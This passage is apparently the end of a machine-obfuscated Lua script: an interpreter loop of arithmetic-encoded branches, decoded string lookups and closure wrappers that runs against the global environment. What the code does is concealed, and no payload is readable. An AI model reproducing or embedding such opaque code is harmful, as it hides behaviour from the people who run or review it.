10058733-(223772+-742041)or(-1329229-(-686840))+1298378 end end end else if f<-642734+15270223 then if f<14437417-(410590-305507)then if f<(13520267-(-800633))-(875222+-725789)then l=not o i=i+G v=i<=B v=l and v l=i>=B l=o and l v=l or v l=60258+6829211 f=v and l v=-122039+5160504 f=f or v else l=V(-648593+711659)o=t d=V((-287896-626441)-((722116+-2112221)-(-412715)))t=w[l]l=V(566043+-502986)f=t[l]u=V(-841536+904589)l=s()y[l]=f t=w[d]d=V(337126+-274047)f=t[d]A=w[u]c=f U=A d=f f=A and 660333+8250793 or 4444842-842161 end else if f<30330+14345262 then y[v]=t f=5846130-(-977297)else t=V(321045+-257983)f=w[t]B=V(-1022335+1085399)d=V(-381222-(-444277))U=C(2108340-(-770883-(-286259)),{})J=y[K[364470+-364466]]i=w[B]l=w[d]d={l(U)}o={g(d)}l=-931369+931371 G=o[l]B=i(G)i=V(1057766-994727)v=J(B,i)J={v()}t=f(g(J))v=y[K[-356192-(-356197)]]J=t t=v f=v and 6297681-(-796552)or(981043+3848579)-761522 end end else if f<-905912+16435882 then if f<407966+14587099 then R=not k I=I+D t=I<=T t=R and t R=I>=T R=k and R t=R or t R=999227+3322021 f=t and R t=12486597-(-864836)f=f or t else k=#P E=784357-(323423-(-460933))h=i(E,k)E=o(P,h)k=y[u]H=1041503+-1041502 q=E-H R=l(q)k[E]=R R=#P h=nil q=-842886-(-842886)k=R==q f=k and 1690970-(((452476-997981)+1275022)-(-257424))or(15578202-(-190218))-626478 E=nil end else if f<(16374107-(-299757))-760596 then f=11186265-(-604699)else D=V((1720997-764481)-893452)R=V(-200111+263201)f=w[D]k=w[R]D=f(k)f=V(-193053-(-256122))w[f]=D f=15203759-(-1361892-(-1030134))end end end end end end end f=#j return g(t)end,function(w,V)local g=i(V)local S=function(...)return f(w,{...},V,g)end return S end,{},function(w,V)local g=i(V)local S=function()return f(w,{},V,g)end return S end,function(w,V)local g=i(V)local S=function(S,K,j)return f(w,{S,K;j},V,g)end return S end,function(w)local V,f=738637+-738636,w[302280+-302279]while f do J[f],V=J[f]-((594593+-892940)-(-298348)),V+(-377019-(-377020))if J[f]==888160+-888160 then J[f],y[f]=nil,nil end f=w[V]end end return(G(918325+9567248,{}))(g(t))end)(getfenv and getfenv()or _ENV,unpack or table[V(580691-(151790-(-365833)))],newproxy,setmetatable,getmetatable,select,{...})end)(...)
